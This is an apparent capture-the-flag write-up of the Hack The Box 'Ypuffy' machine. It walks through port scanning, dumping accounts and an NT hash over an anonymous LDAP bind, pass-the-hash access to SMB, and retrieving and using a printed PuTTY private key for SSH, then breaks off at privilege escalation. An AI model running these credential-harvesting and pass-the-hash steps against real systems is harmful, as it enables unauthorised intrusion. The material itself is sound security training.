I"\Ω<p><strong>Ypuffy</strong> is medium difficulty machine which highlights the danger of allowing <strong>LDAP null sessions</strong>. 
It also features an interesting <strong>SSH CA authentication</strong> privilege escalation, via the <strong>OpenBSD doas</strong> command. 
An additional privilege escalation involving <strong>Xorg</strong> is also possible.</p>

<h2 id="masscan--nmap">Masscan + Nmap</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>masscan <span class="nt">-p1-65535</span>,U:1-65535 <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">--rate</span><span class="o">=</span>5000 <span class="nt">-e</span> tun0 | <span class="nb">tee </span>masscan.out
Scanning 1 hosts <span class="o">[</span>131070 ports/host]
Discovered open port 139/tcp on 10.10.10.107
Discovered open port 80/tcp on 10.10.10.107
Discovered open port 22/tcp on 10.10.10.107
Discovered open port 389/tcp on 10.10.10.107
Discovered open port 445/tcp on 10.10.10.107
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Parse those ports to nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ ports</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>masscan.out |awk <span class="s1">'{ print $4 }'</span> | <span class="nb">sed</span> <span class="s1">'s/\/tcp//;s/\/udp//'</span> | <span class="nb">tr</span> <span class="s1">'\n'</span> <span class="s1">','</span> | <span class="nb">sed</span> <span class="s1">'s/,$//'</span><span class="si">)</span>
<span class="nv">$ </span>nmap <span class="nt">-v</span> <span class="nt">-sVC</span> <span class="nt">--min-rate</span> 1000 <span class="nt">-p</span> <span class="nv">$ports</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-oN</span> nmap-fullscan.out
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 <span class="o">(</span>RSA<span class="o">)</span>
|   256 <span class="nb">dd</span>:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: YPUFFY<span class="o">)</span>
389/tcp open  ldap        <span class="o">(</span>Anonymous <span class="nb">bind </span>OK<span class="o">)</span>
445/tcp open  netbios-ssn Samba smbd 4.7.6 <span class="o">(</span>workgroup: YPUFFY<span class="o">)</span>
Service Info: Host: YPUFFY

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
|   OS: Windows 6.1 <span class="o">(</span>Samba 4.7.6<span class="o">)</span>
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY<span class="se">\x</span>00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System <span class="nb">time</span>: 2021-08-18T12:06:02-04:00
| smb-security-mode:
|   account_used: &lt;blank&gt;
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   <span class="nb">date</span>: 2021-08-18T16:06:03
|_  start_date: N/A
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Added <code class="language-plaintext highlighter-rouge">hackthebox.htb</code>, <code class="language-plaintext highlighter-rouge">ypuffy.hackthebox.htb</code> as hosts.</p>

<h2 id="http">HTTP</h2>
<p>Not accessible, even though nmap says it‚Äôs open.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>root@TheCaretaker:~/HTB/Ypuffy# curl http://ypuffy.hackthebox.htb
curl: <span class="o">(</span>52<span class="o">)</span> Empty reply from server
root@TheCaretaker:~/HTB/Ypuffy# nc ypuffy.hackthebox.htb 80 <span class="nt">-v</span>
ypuffy.hackthebox.htb <span class="o">[</span>10.10.10.107] 80 <span class="o">(</span>http<span class="o">)</span> open
GET /
<span class="nb">help</span>
.HELP
?
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Responds with nothing.</p>

<p>But if I wait for something like 5 mins:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>nc ypuffy.hackthebox.htb 80 <span class="nt">-v</span>
ypuffy.hackthebox.htb <span class="o">[</span>10.10.10.107] 80 <span class="o">(</span>http<span class="o">)</span> open
GET /
HTTP/1.0 408 Request Timeout
Date: Wed, 18 Aug 2021 16:18:53 GMT
Server: OpenBSD httpd
Connection: close
Content-Type: text/html
Content-Length: 439

&lt;<span class="o">!</span>DOCTYPE html&gt;
&lt;html&gt;
&lt;<span class="nb">head</span><span class="o">&gt;</span>
&lt;meta http-equiv<span class="o">=</span><span class="s2">"Content-Type"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"text/html; charset=utf-8"</span>/&gt;
&lt;title&gt;408 Request Timeout&lt;/title&gt;
&lt;style <span class="nb">type</span><span class="o">=</span><span class="s2">"text/css"</span><span class="o">&gt;</span>&lt;<span class="o">!</span><span class="nt">--</span>
body <span class="o">{</span> background-color: white<span class="p">;</span> color: black<span class="p">;</span> font-family: <span class="s1">'Comic Sans MS'</span>, <span class="s1">'Chalkboard SE'</span>, <span class="s1">'Comic Neue'</span>, sans-serif<span class="p">;</span> <span class="o">}</span>
hr <span class="o">{</span> border: 0<span class="p">;</span> border-bottom: 1px dashed<span class="p">;</span> <span class="o">}</span>

<span class="nt">--</span><span class="o">&gt;</span>&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;408 Request Timeout&lt;/h1&gt;
&lt;hr&gt;
&lt;address&gt;OpenBSD httpd&lt;/address&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Shows the server - <code class="language-plaintext highlighter-rouge">OpenBSD httpd</code>, same thing which <code class="language-plaintext highlighter-rouge">nmap</code> did.</p>

<h2 id="ldap">LDAP</h2>
<p>Either I can run <code class="language-plaintext highlighter-rouge">nmap</code> with ldap scripts like: <code class="language-plaintext highlighter-rouge">nmap -p 389 --script *ldap* 10.10.10.107</code><br />
or <code class="language-plaintext highlighter-rouge">ldapsearch</code> with the domain as <code class="language-plaintext highlighter-rouge">hackthebox.htb</code> which I got from nmap results.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>ldapsearch <span class="nt">-x</span> <span class="nt">-h</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-b</span> <span class="s2">"DC=hackthebox,DC=htb"</span>
<span class="c"># extended LDIF</span>
<span class="c">#</span>
<span class="c"># LDAPv3</span>
<span class="c"># base &lt;DC=hackthebox,DC=htb&gt; with scope subtree</span>
<span class="c"># filter: (objectclass=*)</span>
<span class="c"># requesting: ALL</span>
<span class="c">#</span>

<span class="c"># hackthebox.htb</span>
dn: <span class="nv">dc</span><span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
dc: hackthebox
objectClass: top
objectClass: domain

<span class="c"># passwd, hackthebox.htb</span>
dn: <span class="nv">ou</span><span class="o">=</span>passwd,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

<span class="c"># bob8791, passwd, hackthebox.htb</span>
dn: <span class="nv">uid</span><span class="o">=</span>bob8791,ou<span class="o">=</span>passwd,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: <span class="nv">e0JTREFVVEh9Ym9iODc5MQ</span><span class="o">==</span>
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

<span class="c"># alice1978, passwd, hackthebox.htb</span>
dn: <span class="nv">uid</span><span class="o">=</span>alice1978,ou<span class="o">=</span>passwd,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: <span class="o">[</span>U          <span class="o">]</span>
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

<span class="c"># group, hackthebox.htb</span>
dn: <span class="nv">ou</span><span class="o">=</span>group,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
ou: group
objectClass: top
objectClass: organizationalUnit

<span class="c"># bob8791, group, hackthebox.htb</span>
dn: <span class="nv">cn</span><span class="o">=</span>bob8791,ou<span class="o">=</span>group,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: <span class="nv">e2NyeXB0fSo</span><span class="o">=</span>
gidNumber: 5001

<span class="c"># alice1978, group, hackthebox.htb</span>
dn: <span class="nv">cn</span><span class="o">=</span>alice1978,ou<span class="o">=</span>group,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: <span class="nv">e2NyeXB0fSo</span><span class="o">=</span>
gidNumber: 5000

<span class="c"># ypuffy, hackthebox.htb</span>
dn: <span class="nv">sambadomainname</span><span class="o">=</span>ypuffy,dc<span class="o">=</span>hackthebox,dc<span class="o">=</span>htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: <span class="nt">-1</span>
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: <span class="nt">-1</span>
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

<span class="c"># search result</span>
search: 2
result: 0 Success

<span class="c"># numResponses: 9</span>
<span class="c"># numEntries: 8</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I see a lot of users and passwords, also a NThash of <code class="language-plaintext highlighter-rouge">alice1978</code> which is <code class="language-plaintext highlighter-rouge">0B186E661BBDBDCF6047784DE8B9FD8B</code>.</p>

<p>Let‚Äôs take out all the passwords:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>ldapsearch <span class="nt">-x</span> <span class="nt">-h</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-D</span> <span class="s1">''</span> <span class="nt">-w</span> <span class="s1">''</span> <span class="nt">-b</span> <span class="s2">"DC=hackthebox,DC=htb"</span> | <span class="nb">grep</span> <span class="nt">-i</span> <span class="nt">-A2</span> <span class="nt">-B2</span> <span class="s2">"userpas"</span>
objectClass: posixAccount
objectClass: top
userPassword:: <span class="nv">e0JTREFVVEh9Ym9iODc5MQ</span><span class="o">==</span>
uidNumber: 5001
gidNumber: 5001
<span class="nt">--</span>
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
<span class="nt">--</span>
objectClass: top
cn: bob8791
userPassword:: <span class="nv">e2NyeXB0fSo</span><span class="o">=</span>
gidNumber: 5001

<span class="nt">--</span>
objectClass: top
cn: alice1978
userPassword:: <span class="nv">e2NyeXB0fSo</span><span class="o">=</span>
gidNumber: 5000
</pre></td></tr></tbody></table></code></pre></div></div>
<p>These passwords seem to be base64 encoded. When I decode them, they just come like in the format: <code class="language-plaintext highlighter-rouge">{BSDAUTH}username</code> eg. <code class="language-plaintext highlighter-rouge">{BSDAUTH}alice1978</code>.
That isn‚Äôt userful to me.</p>

<h2 id="pass-the-hash-with-smb">Pass-the-hash with SMB</h2>
<p>Checking for <code class="language-plaintext highlighter-rouge">anonymous</code> login:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>smbclient <span class="nt">-L</span> ypuffy.hackthebox.htb <span class="nt">-U</span> anonymous
WARNING: no network interfaces found
Enter WORKGROUP<span class="se">\a</span>nonymous<span class="s1">'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Checking for any user named ‚Äúanonymous‚Äù (being on the safer side; from trolls)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>smbclient <span class="nt">-L</span> ypuffy.hackthebox.htb <span class="nt">-U</span> anonymous
WARNING: no network interfaces found
Enter WORKGROUP<span class="se">\a</span>nonymous<span class="s1">'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>I can try with <code class="language-plaintext highlighter-rouge">crackmapexec</code> for <code class="language-plaintext highlighter-rouge">ldap</code> with the NThash:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>crackmapexec ldap <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-u</span> alice1978 <span class="nt">-H</span> 0B186E661BBDBDCF6047784DE8B9FD8B
LDAP        10.10.10.107    389    YPUFFY           <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 6.1 <span class="o">(</span>name:YPUFFY<span class="o">)</span> <span class="o">(</span>domain:hackthebox.htb<span class="o">)</span> <span class="o">(</span>signing:False<span class="o">)</span> <span class="o">(</span>SMBv1:True<span class="o">)</span>
Traceback <span class="o">(</span>most recent call last<span class="o">)</span>:
  File <span class="s2">"/usr/bin/crackmapexec"</span>, line 33, <span class="k">in</span> &lt;module&gt;
    sys.exit<span class="o">(</span>load_entry_point<span class="o">(</span><span class="s1">'crackmapexec==5.1.4.dev0'</span>, <span class="s1">'console_scripts'</span>, <span class="s1">'crackmapexec'</span><span class="o">)())</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">crackmapexec</code> for <code class="language-plaintext highlighter-rouge">smb</code> gives as valid:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>crackmapexec smb <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-u</span> alice1978 <span class="nt">-H</span> 0B186E661BBDBDCF6047784DE8B9FD8B
SMB         10.10.10.107    445    YPUFFY           <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 6.1 <span class="o">(</span>name:YPUFFY<span class="o">)</span> <span class="o">(</span>domain:hackthebox.htb<span class="o">)</span> <span class="o">(</span>signing:False<span class="o">)</span> <span class="o">(</span>SMBv1:True<span class="o">)</span>
SMB         10.10.10.107    445    YPUFFY           <span class="o">[</span>+] hackthebox.htb<span class="se">\a</span>lice1978 0B186E661BBDBDCF6047784DE8B9FD8B
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, <code class="language-plaintext highlighter-rouge">smbclient</code> does support pass-the-hash method. I‚Äôll try for user alice.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>smbclient <span class="nt">-L</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-U</span> alice1978 <span class="nt">--pw-nt-hash</span><span class="o">=</span>0B186E661BBDBDCF6047784DE8B9FD8B <span class="nt">-W</span> hackthebox.local
WARNING: no network interfaces found
Enter HACKTHEBOX.LOCAL<span class="se">\a</span>lice1978<span class="s1">'s password:

        Sharename       Type      Comment
        ---------       ----      -------
        alice           Disk      Alice'</span>s Windows Directory
        IPC<span class="nv">$ </span>           IPC       IPC Service <span class="o">(</span>Samba Server<span class="o">)</span>
SMB1 disabled <span class="nt">--</span> no workgroup available
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Getting data from alice share:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>smbclient //<span class="sb">`</span>IP<span class="sb">`</span>/alice <span class="nt">-U</span> alice1978%0B186E661BBDBDCF6047784DE8B9FD8B <span class="nt">--pw-nt-hash</span>
WARNING: no network interfaces found
Try <span class="s2">"help"</span> to get a list of possible commands.
smb: <span class="se">\&gt;</span> <span class="nb">ls</span>
  <span class="nb">.</span>                                   D        0  Tue Jul 31 08:24:20 2018
  ..                                  D        0  Wed Aug  1 08:46:50 2018
  my_private_key.ppk                  A     1460  Tue Jul 17 07:08:51 2018

                433262 blocks of size 1024. 411540 blocks available
smb: <span class="se">\&gt;</span> mget <span class="k">*</span>
Get file my_private_key.ppk? y
getting file <span class="se">\m</span>y_private_key.ppk of size 1460 as my_private_key.ppk <span class="o">(</span>4.0 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 4.0 KiloBytes/sec<span class="o">)</span>
smb: <span class="se">\&gt;</span> <span class="nb">exit</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="putty-ppk-to-ssh">PuTTY ppk to SSH</h1>
<p>Checking what that key is, and it‚Äôs a PuTTY private key.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>file my_private_key.ppk
my_private_key.ppk: PuTTY Private Key File, version 2, algorithm ssh-rsa, Encryption none <span class="s2">"rsa-key-20180716"</span>
<span class="nv">$ </span><span class="nb">cat </span>my_private_key.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20180716
Public-Lines: 6
AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz
1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux
BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj
h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa
iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx
ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw<span class="o">==</span>
Private-Lines: 14
AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF
VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE
cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma
hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q
Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC
3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6
m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6
l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v
4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+
qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh
hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA
AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c
QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl
xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts<span class="o">=</span>
Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Converting PuTTY key to SSH private key:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>puttygen my_private_key.ppk <span class="nt">-O</span> private-openssh <span class="nt">-o</span> id_rsa
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Logging in as <code class="language-plaintext highlighter-rouge">alice1978</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>m
OpenBSD 6.3 <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c">#100: Sat Mar 24 14:17:45 MDT 2018</span>

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug<span class="o">(</span>1<span class="o">)</span> utility to report bugs <span class="k">in </span>the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and <span class="k">if </span>a
known fix <span class="k">for </span>it exists, include that as well.

ypuffy<span class="nv">$ </span><span class="nb">whoami
</span>alice1978
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="privesc-via-ssh-ca-authentication">Privesc via SSH CA authentication</h1>
<h2 id="postgresql">PostgreSQL</h2>
<p>Checking for open ports, I‚Äôve one for <code class="language-plaintext highlighter-rouge">postgresql</code> server:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>netstat <span class="nt">-l</span> <span class="nt">-p</span> tcp
Active Internet connections <span class="o">(</span>only servers<span class="o">)</span>
Proto   Recv-Q Send-Q  Local Address          Foreign Address        <span class="o">(</span>state<span class="o">)</span>
tcp          0      0  <span class="k">*</span>.microsof             <span class="k">*</span>.<span class="k">*</span>                    LISTEN
tcp          0      0  localhost.postgres     <span class="k">*</span>.<span class="k">*</span>                    LISTEN
tcp          0      0  <span class="k">*</span>.www                  <span class="k">*</span>.<span class="k">*</span>                    LISTEN
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>netstat <span class="nt">-lu</span>
Active UNIX domain sockets
Address            Type   Recv-Q Send-Q              Inode               Conn               Refs            Nextref Addr
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0 /var/run/cron.sock
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0
               0x0 stream      0      0                0x0                0x0                0x0                0x0 /var/www/run/wsgi/sshauthd.socket
               0x0 stream      0      0                0x0                0x0                0x0                0x0 /tmp/.s.PGSQL.5432
               0x0 stream      0      0                0x0                0x0                0x0                0x0 /var/run/samba/nmbd/unexpected
</pre></td></tr></tbody></table></code></pre></div></div>

<p>User <code class="language-plaintext highlighter-rouge">bob8791</code> has a weird file named <code class="language-plaintext highlighter-rouge">sshauth.sql</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /home/bob8791/dba
total 12
drwxr-xr-x  2 bob8791  bob8791  512 Jul 30  2018 <span class="nb">.</span>
drwxr-xr-x  3 bob8791  bob8791  512 Jul 30  2018 ..
<span class="nt">-rw-r--r--</span>  1 bob8791  bob8791  268 Jul 30  2018 sshauth.sql
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">principals</span> <span class="p">(</span>
        <span class="n">uid</span> <span class="nb">text</span><span class="p">,</span>
        <span class="n">client</span> <span class="n">cidr</span><span class="p">,</span>
        <span class="n">principal</span> <span class="nb">text</span><span class="p">,</span>
        <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="p">(</span><span class="n">uid</span><span class="p">,</span><span class="n">client</span><span class="p">,</span><span class="n">principal</span><span class="p">)</span>
<span class="p">);</span><span class="o">****</span>

<span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">keys</span> <span class="p">(</span>
        <span class="n">uid</span> <span class="nb">text</span><span class="p">,</span>
        <span class="k">key</span> <span class="nb">text</span><span class="p">,</span>
        <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="p">(</span><span class="n">uid</span><span class="p">,</span><span class="k">key</span><span class="p">)</span>
<span class="p">);</span>
<span class="k">grant</span> <span class="k">select</span> <span class="k">on</span> <span class="n">principals</span><span class="p">,</span><span class="n">keys</span> <span class="k">to</span> <span class="n">appsrv</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I couldn‚Äôt login to <code class="language-plaintext highlighter-rouge">postgresql</code> server using the default creds <code class="language-plaintext highlighter-rouge">postgres:postgres</code> with <code class="language-plaintext highlighter-rouge">psql</code>.</p>

<h2 id="doas">doas</h2>
<p>If I run <code class="language-plaintext highlighter-rouge">doas</code>, <code class="language-plaintext highlighter-rouge">sudo</code> in openbsd, it shows nothing.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
